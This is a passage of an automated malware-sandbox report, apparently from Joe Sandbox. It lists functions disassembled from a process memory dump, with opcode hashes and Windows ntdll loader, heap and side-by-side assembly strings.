                                                                                                                                                                                                                      • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 00FB2602
                                                                                                                                                                                                                      • RtlpResolveAssemblyStorageMapEntry, xrefs: 00FB261F
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                                                                                                                      • API String ID: 0-4009184096
                                                                                                                                                                                                                      • Opcode ID: 082e019aafc63b3303a2f187aede2eca5961cc5b792b9aa8235904ca86a8f13f
                                                                                                                                                                                                                      • Instruction ID: 20fd3bdd98dad365f58f7eb5b9cbc7da666b450ce35f9edc1e9d6968f7667fdf
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 082e019aafc63b3303a2f187aede2eca5961cc5b792b9aa8235904ca86a8f13f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 570260B2D002289BDB71DB14CC81BDDB7B8AB54314F0441EAE64DA7241DB35AF84EF5A
                                                                                                                                                                                                                      Function 00FE8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                                                                                                                      • API String ID: 0-2515994595
                                                                                                                                                                                                                      • Opcode ID: 4a8b2997a50200861f097135928ad8ab0f4fe41fe17b5d9d52fcd10fd81564f7
                                                                                                                                                                                                                      • Instruction ID: 7f7cf886162b45346146ba9f20a373ac3a609408b03743ce84df317d80f38e2a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4a8b2997a50200861f097135928ad8ab0f4fe41fe17b5d9d52fcd10fd81564f7
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6151D3715083919BC335EF198C44BABBBE8BF843A0F24491EF85D83181EB70D945E7A2
                                                                                                                                                                                                                      Function 00FF0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                                                                                                      • API String ID: 0-1700792311
                                                                                                                                                                                                                      • Opcode ID: 7220b3052e1991e925bd5f94dc33b092a663d4ef34c0ba1d25569cf3ef82ce53
                                                                                                                                                                                                                      • Instruction ID: b64594d385b9418dd989b77106dca68b901e607b2a8ba884e346e2e4c9fe69d0
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7220b3052e1991e925bd5f94dc33b092a663d4ef34c0ba1d25569cf3ef82ce53
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C9D1D031900689DFCB22DF68C851ABDBBF1FF49720F088059E6459B263CB39D981EB10
                                                                                                                                                                                                                      Function 00FC89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • VerifierFlags, xrefs: 00FC8C50
                                                                                                                                                                                                                      • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 00FC8A67
                                                                                                                                                                                                                      • HandleTraces, xrefs: 00FC8C8F
                                                                                                                                                                                                                      • VerifierDlls, xrefs: 00FC8CBD
                                                                                                                                                                                                                      • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 00FC8A3D
                                                                                                                                                                                                                      • VerifierDebug, xrefs: 00FC8CA5
                                                                                                                                                                                                                      • AVRF: -*- final list of providers -*- , xrefs: 00FC8B8F
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                                                                                                                      • API String ID: 0-3223716464
                                                                                                                                                                                                                      • Opcode ID: f2bf20de3203455af497e2d17e2d4ef89ccd4a9c865e12f3ee21ace71a8c2b07
                                                                                                                                                                                                                      • Instruction ID: b0819d7eb16ddcc8b186dc7825fd56457ae4d641d360b4515567760ae7b13356
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f2bf20de3203455af497e2d17e2d4ef89ccd4a9c865e12f3ee21ace71a8c2b07
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E0914872A05712AFC321DF68DE83F5A77A8BB84760F05441DF9816B291CB78EC06E791
                                                                                                                                                                                                                      Function 00F4EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                                                                                                                      • API String ID: 0-1109411897
                                                                                                                                                                                                                      • Opcode ID: 6b2fa83eaff73473c4cbad69f67b274537c04dbce707b999293ae98458967b60
                                                                                                                                                                                                                      • Instruction ID: 08bbd55141d56afe252836feb142cdeec6a5cf7233e2122ede9be5b3e7216a10
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6b2fa83eaff73473c4cbad69f67b274537c04dbce707b999293ae98458967b60
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1CA24C75E056298FDB64CF18CC887A9BBB5BF85314F2442E9D80DA7250DB74AE85EF00
                                                                                                                                                                                                                      Function 00F763FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                      • API String ID: 0-792281065
                                                                                                                                                                                                                      • Opcode ID: f71369f2b01ee1078b8071e8dcd0ffcacf042eb32aee8b9a96c627eaa95fd2e9
                                                                                                                                                                                                                      • Instruction ID: a87aa24b23a5bac97cb0f7008ea3d9d155c891565faaf7878bf1ecc214073adc
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f71369f2b01ee1078b8071e8dcd0ffcacf042eb32aee8b9a96c627eaa95fd2e9
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7D916931E00710ABDB35EF15ED45BEA37A4BF41B24F14412AF944AB2C2D779A841FB92
                                                                                                                                                                                                                      Function 00F3645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • apphelp.dll, xrefs: 00F36496
                                                                                                                                                                                                                      • Building shim user DLL system32 filename failed with status 0x%08lx, xrefs: 00F999ED
                                                                                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 00F99A11, 00F99A3A
                                                                                                                                                                                                                      • Getting the shim user exports failed with status 0x%08lx, xrefs: 00F99A01
                                                                                                                                                                                                                      • LdrpInitShimEngine, xrefs: 00F999F4, 00F99A07, 00F99A30
                                                                                                                                                                                                                      • Loading the shim user DLL failed with status 0x%08lx, xrefs: 00F99A2A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: Building shim user DLL system32 filename failed with status 0x%08lx$Getting the shim user exports failed with status 0x%08lx$LdrpInitShimuser$Loading the shim user DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                      • API String ID: 0-204845295
                                                                                                                                                                                                                      • Opcode ID: 6da634ccf37575eee5d3ae296292c5144623c9b58cdf4b1230bdbce180736850
                                                                                                                                                                                                                      • Instruction ID: a1c26a7fdf087e4b6e52d2b0d6ca198cdc2fd9a53050fcbab1561c32b519c5c1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6da634ccf37575eee5d3ae296292c5144623c9b58cdf4b1230bdbce180736850
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5351D171608300ABE720DF24DC82BAB77E8FB84754F00491DF5859B1A1D778E904EB92
                                                                                                                                                                                                                      Function 00F7C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • Unable to build import redirection Table, Status = 0x%x, xrefs: 00FB81E5
                                                                                                                                                                                                                      • Loading import redirection DLL: '%wZ', xrefs: 00FB8170
                                                                                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 00F7C6C3
                                                                                                                                                                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 00FB8181, 00FB81F5
                                                                                                                                                                                                                      • LdrpInitializeImportRedirection, xrefs: 00FB8177, 00FB81EB
                                                                                                                                                                                                                      • LdrpInitializeProcess, xrefs: 00F7C6C4
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                                                                      • API String ID: 0-475462383
                                                                                                                                                                                                                      • Opcode ID: e35f35d2a19e9c892a9870687dd30286ce70cdcd741e4b5e152ed20d47640c44
                                                                                                                                                                                                                      • Instruction ID: fe06095576291c647f9192054226eacc5d406c6bbd1c7a90b2a5b61877e71f76
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e35f35d2a19e9c892a9870687dd30286ce70cdcd741e4b5e152ed20d47640c44
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4A310B716443159FC220EF68DD87E5A7798FFC5B10F04452CF8889B291DA28DD05EBA3
                                                                                                                                                                                                                      Function 00F72674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 00FB219F
                                                                                                                                                                                                                      • RtlGetAssemblyStorageRoot, xrefs: 00FB2160, 00FB219A, 00FB21BA
                                                                                                                                                                                                                      • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 00FB2178
                                                                                                                                                                                                                      • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 00FB2180
                                                                                                                                                                                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 00FB21BF
                                                                                                                                                                                                                      • SXS: %s() passed the empty activation context, xrefs: 00FB2165
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                                                                                                      • API String ID: 0-861424205
                                                                                                                                                                                                                      • Opcode ID: ca9a892f491cb0b2b6cad727e4e41787acabee67e789ff12a29b41e7bf0d19f4
                                                                                                                                                                                                                      • Instruction ID: 87fa217a3a256f02c76dee81986bf3ef1dd9201d0e48017de2e7286123808e43
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ca9a892f491cb0b2b6cad727e4e41787acabee67e789ff12a29b41e7bf0d19f4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AF315C36F0032177E7219A598C86FDFB778DB54B50F15405ABA0877241D270DE01FBA2
                                                                                                                                                                                                                      Function 00F8096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00F82DF0: LdrInitializeThunk.NTDLL ref: 00F82DFA
                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F80BA3
                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F80BB6
                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F80D60
                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F80D74
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1404860816-0
                                                                                                                                                                                                                      • Opcode ID: 8f550626082fd000e19d6cd748258ca2265d86769ca46ff813b20e73e6a71695
                                                                                                                                                                                                                      • Instruction ID: a6000922a38e5ec15ba7a29d783e079ebd3cb490cb49413de746b191b76c10e3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8f550626082fd000e19d6cd748258ca2265d86769ca46ff813b20e73e6a71695
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7C426B72900715DFDB60DF64C881BEAB7F4BF04310F1485A9E999EB241EB74AA84DF60
                                                                                                                                                                                                                      Function 00F4A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                                                                                                      • API String ID: 0-379654539
                                                                                                                                                                                                                      • Opcode ID: e8fe3d71ef1451c8713fdbcdae6aef298800eb820af5bb1a523819cafb880baf
                                                                                                                                                                                                                      • Instruction ID: 5c4cdf5ddfef660705167e3d1c4d62905b61aa86798af2dbe0e160808eb7c9cb
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e8fe3d71ef1451c8713fdbcdae6aef298800eb820af5bb1a523819cafb880baf
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E6C19BB56483828FD711CF18C540B6ABBE4FF85714F04486AFC958B261E778CA49EB53
                                                                                                                                                                                                                      Function 00F78402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 00F78421
                                                                                                                                                                                                                      • @, xrefs: 00F78591
                                                                                                                                                                                                                      • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 00F7855E
                                                                                                                                                                                                                      • LdrpInitializeProcess, xrefs: 00F78422
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                      • API String ID: 0-1918872054
                                                                                                                                                                                                                      • Opcode ID: a64daf1557ed5163904d5f96cc728f15f3727562dd028caa4420d15aa396eb49
                                                                                                                                                                                                                      • Instruction ID: e162fc613903edb2f025227b4825d6658bdb6a7596497005389b2b654d1b66e3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a64daf1557ed5163904d5f96cc728f15f3727562dd028caa4420d15aa396eb49
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BB91BD71548340AFD721EE21CC45FABBBECBF84794F44492EFA8892041E738D945AB63
                                                                                                                                                                                                                      Function 00F7273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • .Local, xrefs: 00F728D8
                                                                                                                                                                                                                      • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 00FB21D9, 00FB22B1
                                                                                                                                                                                                                      • SXS: %s() passed the empty activation context, xrefs: 00FB21DE
                                                                                                                                                                                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 00FB22B6
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                                                                                                      • API String ID: 0-1239276146
                                                                                                                                                                                                                      • Opcode ID: ed1ecf6015cdba9535cff81c6a8f08aabca43e1882387a57b5fcd56da1f01254
                                                                                                                                                                                                                      • Instruction ID: eed8a7fd440a778388e68070f0b134abdca37a1af9f89ffa9298c99ab1e922d9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ed1ecf6015cdba9535cff81c6a8f08aabca43e1882387a57b5fcd56da1f01254
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E1A1B232D00229DBDB64CF55DC84BE9B3B5BF58324F2441EAD908A7251D7309E81EF92
                                                                                                                                                                                                                      Function 00F74AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • RtlDeactivateActivationContext, xrefs: 00FB3425, 00FB3432, 00FB3451
                                                                                                                                                                                                                      • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 00FB3456
                                                                                                                                                                                                                      • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 00FB3437
                                                                                                                                                                                                                      • SXS: %s() called with invalid flags 0x%08lx, xrefs: 00FB342A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                                                                                                                                      • API String ID: 0-1245972979
                                                                                                                                                                                                                      • Opcode ID: 8ec06cbaf3ceefb47b71f8b80b9587223c4171c28552fade45dea1604912b1b9
                                                                                                                                                                                                                      • Instruction ID: 253f6b8e65fcedda8825eaf6a59f2ccc8b36339b547835f74980c05cd69ad848
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8ec06cbaf3ceefb47b71f8b80b9587223c4171c28552fade45dea1604912b1b9
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F1612A32A44B11DFC722CF19C842B66B7E5EF80B60F15852AF8599B281D734FD01EB92
                                                                                                                                                                                                                      Function 00F464AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 00FA0FE5
                                                                                                                                                                                                                      • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 00FA10AE
                                                                                                                                                                                                                      • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 00FA106B
                                                                                                                                                                                                                      • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 00FA1028
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                                                                                                                      • API String ID: 0-1468400865
                                                                                                                                                                                                                      • Opcode ID: c4a87a7ce2b9f86dfe0071a88e479d4216e037a016b19da629d4f8b6738e7bc0
                                                                                                                                                                                                                      • Instruction ID: 3157dcaa84d1958e8d0417b1ddf4363efb8072917cc06c6c46ad6d9420f1029e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c4a87a7ce2b9f86dfe0071a88e479d4216e037a016b19da629d4f8b6738e7bc0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BF71BEB19043049FCB20EF14C885B9B7FA8AF96764F140468FD498B286D739D589EBD2
                                                                                                                                                                                                                      Function 00F6245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • apphelp.dll, xrefs: 00F62462
                                                                                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 00FAA9A2
                                                                                                                                                                                                                      • LdrpDynamicShimModule, xrefs: 00FAA998
                                                                                                                                                                                                                      • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 00FAA992
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                      • API String ID: 0-176724104
                                                                                                                                                                                                                      • Opcode ID: 47aa9eb3d94f28141bd8e90dba8c96ffc44e26cd6337058ccf73e1cace887619
                                                                                                                                                                                                                      • Instruction ID: 6ebdbf637fc366511db8274f41abff015b28ca286e3bcec09f889f0e736c38d8
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 47aa9eb3d94f28141bd8e90dba8c96ffc44e26cd6337058ccf73e1cace887619
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 71315BB2A00201EBDB30DF59DC85A6A77B8FB89724F154019F8416F245C77D9D45E741
                                                                                                                                                                                                                      Function 00F529A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • HEAP[%wZ]: , xrefs: 00F53255
                                                                                                                                                                                                                      • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 00F5327D
                                                                                                                                                                                                                      • HEAP: , xrefs: 00F53264
                                                                                                                                                                                                                      Memory Dump Source
